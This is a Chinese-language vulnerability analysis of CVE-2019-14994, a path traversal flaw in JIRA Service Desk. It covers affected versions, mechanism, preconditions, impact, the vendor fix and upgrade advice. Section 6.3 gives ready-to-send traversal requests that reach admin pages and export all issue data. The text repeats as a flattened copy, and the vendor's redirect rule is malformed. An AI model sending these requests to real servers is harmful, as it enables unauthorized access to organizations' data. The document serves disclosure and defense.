Jira服务工作台路径遍历导致的敏感信息泄露漏洞(CVE-2019-14994)分析报告

1. 漏洞概述

CVE-2019-14994是JIRA Service Desk中存在的一个路径遍历漏洞，允许普通用户通过构造特殊URL访问管理员门户中的敏感信息。该漏洞由安全研究人员发现并报告，获得了Atlassian公司11,000美元的奖励。

2. 受影响产品

JIRA Service Desk是Atlassian旗下JIRA类应用的核心产品，是一款服务台管理软件，专门用于接受和处理团队或用户的问题或请求。

3. 受影响版本

以下版本的JIRA Service Desk受此漏洞影响：

所有早于3.9.16的版本
3.10.x所有版本
3.11.x所有版本
3.12.x所有版本
3.13.x所有版本
3.14.x所有版本
3.15.x所有版本
3.16.x早于3.16.8的版本
4.0.x所有版本
4.1.x早于4.1.3的版本
4.2.x早于4.2.5的版本
4.3.x早于4.3.4的版本
4.4.0早于4.4.1的版本

4. 漏洞原理

4.1 JIRA Service Desk门户结构

JIRA Service Desk主要有两个管理门户：

用户门户(Customer portal)：通过/servicedesk/目录访问
管理员门户(Administrative portal)：通过/secure/目录访问

4.2 漏洞机制

正常情况下，普通用户访问管理员目录(/secure/或/sr/)会被阻止并重定向到用户门户页面。然而，通过构造包含路径遍历序列(../)的特殊URL，攻击者可以绕过这种保护机制，访问管理员门户中的敏感信息。

5. 漏洞利用条件

要成功利用此漏洞，需要满足以下条件：

JIRA Service Desk中"anyone can email the service desk or raise a request in the portal"设置选项已开启
攻击者能够通过身份验证并正常提交工单(Support Ticket)

6. 漏洞验证与复现

6.1 确认目标运行JIRA Service Desk

访问以下URL确认目标是否运行JIRA Service Desk：

https://target.com/servicedesk/

如果返回管理登录界面，则确认运行该服务。

6.2 注册普通用户账户

在登录界面点击"Sign up"按钮完成注册
如果没有显示注册按钮，则需要内部员工账号才能利用此漏洞

6.3 构造恶意请求

使用Burp等工具构造以下请求：

方法一：访问管理员项目浏览页面

GET /servicedesk/customer/../../secure/BrowseProjects.jspa HTTP/1.1
Host: target.com
Cookie: [authenticated as a customer]

方法二：导出所有组织数据

GET /servicedesk/customer/../../sr/jira.issueviews:searchrequest-html-all-fields/temp/SearchRequest.html?jqlQuery=text+%7E+%22%22 HTTP/1.1
Host: target.com
Cookie: [authenticated as a customer]

如果返回"not found"，可尝试XML格式：

GET /servicedesk/customer/../../sr/jira.issueviews:searchrequest-xml/temp/SearchRequest.xml?jqlQuery=text+%7E+%22%22 HTTP/1.1

7. 漏洞影响

成功利用此漏洞可以：

访问管理员门户中的项目浏览页面
通过jqlQuery查询导出所有感兴趣的组织数据
获取JIRA项目提交的所有实例问题清单
可能访问Jira Service Desk自身、Jira Core projects以及Jira Software等项目信息

8. 厂商修复方案

Atlassian提供的修复方案是添加重定向规则：

<rule>
    <from>from>
    <to type="temporary-redirect">/</to>
</rule>

但此方案仅声明了用户的有限访问规则，仍可能被绕过。

9. 安全建议

及时升级到修复版本：
- 3.16.x升级到3.16.8或更高
- 4.1.x升级到4.1.3或更高
- 4.2.x升级到4.2.5或更高
- 4.3.x升级到4.3.4或更高
- 4.4.0升级到4.4.1或更高
如无法立即升级，可考虑：
- 关闭"anyone can email the service desk or raise a request in the portal"选项
- 加强访问控制策略
实施更严格的输入验证和路径规范化处理

10. 漏洞价值

该漏洞因其对Atlassian核心服务的重大影响，获得了：

10,000美元的基础奖励
1,000美元的"停止测试"奖金
总计11,000美元的奖励

11. 参考资源

Atlassian官方安全公告
Bugcrowd平台Atlassian Bug Bash众测项目
Orange Tsai此前对Atlassian产品的相关研究

Jira服务工作台路径遍历导致的敏感信息泄露漏洞(CVE-2019-14994)分析报告 1. 漏洞概述 CVE-2019-14994是JIRA Service Desk中存在的一个路径遍历漏洞，允许普通用户通过构造特殊URL访问管理员门户中的敏感信息。该漏洞由安全研究人员发现并报告，获得了Atlassian公司11,000美元的奖励。 2. 受影响产品 JIRA Service Desk是Atlassian旗下JIRA类应用的核心产品，是一款服务台管理软件，专门用于接受和处理团队或用户的问题或请求。 3. 受影响版本以下版本的JIRA Service Desk受此漏洞影响：所有早于3.9.16的版本 3.10.x所有版本 3.11.x所有版本 3.12.x所有版本 3.13.x所有版本 3.14.x所有版本 3.15.x所有版本 3.16.x早于3.16.8的版本 4.0.x所有版本 4.1.x早于4.1.3的版本 4.2.x早于4.2.5的版本 4.3.x早于4.3.4的版本 4.4.0早于4.4.1的版本 4. 漏洞原理 4.1 JIRA Service Desk门户结构 JIRA Service Desk主要有两个管理门户：用户门户(Customer portal) ：通过 /servicedesk/ 目录访问管理员门户(Administrative portal) ：通过 /secure/ 目录访问 4.2 漏洞机制正常情况下，普通用户访问管理员目录( /secure/ 或 /sr/ )会被阻止并重定向到用户门户页面。然而，通过构造包含路径遍历序列( ../ )的特殊URL，攻击者可以绕过这种保护机制，访问管理员门户中的敏感信息。 5. 漏洞利用条件要成功利用此漏洞，需要满足以下条件： JIRA Service Desk中"anyone can email the service desk or raise a request in the portal"设置选项已开启攻击者能够通过身份验证并正常提交工单(Support Ticket) 6. 漏洞验证与复现 6.1 确认目标运行JIRA Service Desk 访问以下URL确认目标是否运行JIRA Service Desk：如果返回管理登录界面，则确认运行该服务。 6.2 注册普通用户账户在登录界面点击"Sign up"按钮完成注册如果没有显示注册按钮，则需要内部员工账号才能利用此漏洞 6.3 构造恶意请求使用Burp等工具构造以下请求：方法一：访问管理员项目浏览页面方法二：导出所有组织数据如果返回"not found"，可尝试XML格式： 7. 漏洞影响成功利用此漏洞可以：访问管理员门户中的项目浏览页面通过jqlQuery查询导出所有感兴趣的组织数据获取JIRA项目提交的所有实例问题清单可能访问Jira Service Desk自身、Jira Core projects以及Jira Software等项目信息 8. 厂商修复方案 Atlassian提供的修复方案是添加重定向规则：但此方案仅声明了用户的有限访问规则，仍可能被绕过。 9. 安全建议及时升级到修复版本： 3.16.x升级到3.16.8或更高 4.1.x升级到4.1.3或更高 4.2.x升级到4.2.5或更高 4.3.x升级到4.3.4或更高 4.4.0升级到4.4.1或更高如无法立即升级，可考虑：关闭"anyone can email the service desk or raise a request in the portal"选项加强访问控制策略实施更严格的输入验证和路径规范化处理 10. 漏洞价值该漏洞因其对Atlassian核心服务的重大影响，获得了： 10,000美元的基础奖励 1,000美元的"停止测试"奖金总计11,000美元的奖励 11. 参考资源 Atlassian官方安全公告 Bugcrowd平台Atlassian Bug Bash众测项目 Orange Tsai此前对Atlassian产品的相关研究